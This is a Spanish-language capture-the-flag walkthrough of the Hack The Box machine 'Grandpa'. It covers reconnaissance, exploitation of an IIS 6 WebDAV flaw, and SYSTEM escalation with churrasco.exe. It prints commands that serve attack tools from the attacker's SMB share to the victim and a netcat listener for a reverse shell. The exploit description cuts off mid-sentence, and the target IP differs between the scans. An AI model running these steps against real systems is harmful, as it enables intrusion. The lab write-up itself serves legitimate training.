# Grandpa
En este artículo, vamos a abordar la resolución de la máquina Grandpa de la plataforma Hack The Box. En primer lugar, para ganar acceso al sistema explotaremos una vulnerabilidad presente en el servidor IIS 6. Esta es vulnerabilidad crítica en el servidor web Microsoft Internet Information Services (IIS), específicamente en el componente WebDAV (Web Distributed Authoring and Versioning). La vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en el servidor afectado, potencialmente tomando control completo del sistema. Finalmente, para escalar nuestros privilegios abusaremos del privilegio `SeImpersonatePrivilege` utilizando la utilidad `churrasco.exe`. ## Reconocimiento Lanzamos una traza ICMP a la máquina víctima para comprobar que tengamos conectividad.

Reconocimiento usando el comando ping

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127. ### Descubrimiento de puertos abiertos Realizamos un escaneo con `nmap` para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
```bash nmap -sS -p- --open --min-rate 5000 10.10.10.14 -n -Pn -oG scanPorts -vvv ```

Descubrimiento de puertos abiertos

### Enumeración de versión y servicio Lanzamos una serie de script básicos de enumeración propios de `nmap`, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos.
```bash nmap -sCV -p21,80 10.10.10.5 -oN targeted -vvv ```

Descubrimiento de versión y servicio con nmap

## Explotación Si ingresamos a la web que esta corriendo bajo el puerto 80, nos encontramos con lo siguiente:

Web

Una página por defecto de una instancia del servidor IIS, en este caso en su versión 6. Se realizamos un búsqueda en Google, podemos ver que IIS 6 cuenta con una vulnerabilidad critica catalogada bajo el CVE - CVE-2017-7269. Esta es vulnerabilidad crítica en el servidor web Microsoft Internet Information Services (IIS), específicamente en el componente WebDAV (Web Distributed Authoring and Versioning). La vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en el servidor afectado, potencialmente tomando control completo del sistema. Dicha vulnerabilidad reside en el manejo incorrecto de las solicitudes HTTP por parte del componente WebDAV en IIS. Un atacante puede enviar una solicitud especialmente diseñada que incluye una cabecera "`If:

Ejecución del exploit

Ganamos acceso al sistema como el usuario `nt authority\network service`.

Ganamos acceso al sistema.

## Escalación de privilegios Si listamos los privilegios de nuestro usuario, podemos observar uno que destaca `SeImpersonatePrivilege`.

Privilegios del usuario nt authority\network service

> El privilegio **SeImpersonatePrivilege** en Windows permite a un proceso suplantar (impersonar) a un usuario después de autenticarse. En otras palabras, le da a un proceso la capacidad de ejecutar acciones en nombre de otro usuario. Este privilegio es crucial para ciertos servicios y aplicaciones que necesitan realizar tareas en nombre de los usuarios, pero también puede ser un riesgo de seguridad si se abusa de él. Por ejemplo, un atacante con este privilegio podría suplantar a un administrador y realizar acciones maliciosas con altos privilegios. Para escalar privilegios, podemos abusar de este privilegio utilizando la utilidad `churrasco.exe`. Descargamos la utilidad [churrasco.exe](https://github.com/Re4son/Churrasco/blob/master/churrasco.exe) y [nc.exe](https://github.com/int0x33/nc.exe/blob/master/nc.exe). Creamos un recurso compartido con `impacket-smbserver` para poder transferir estos binarios a la máquina víctima. ```bash impacket-smbserver -smb2support sharedFolder . ``` Descargamos los binarios en la máquina víctima. ``` copy \\10.10.14.2\sharedFolder\churrasco.exe churrasco.exe copy \\10.10.14.2\sharedFolder\nc.exe nc.exe ``` Nos ponemos en escucha con netcat por el puerto `443`. ```bash rlwrap nc -lnvp 443 ``` Ejecutamos `churrasco.exe`.

Ejecución de churrasco.exe

Ganamos acceso al sistema como `nt authority\system`.

nt authority\system

Por ultimo, leemos los flags de `user.txt` y `root.txt`.

Flags

De esta forma, concluimos la resolución de la máquina Grandpa. Espero que los conceptos hayan quedado claros. En caso de tener alguna duda, te invito a realizar nuevamente la máquina para afianzar tus conocimientos. ¡Gracias por leer! Happy Hacking!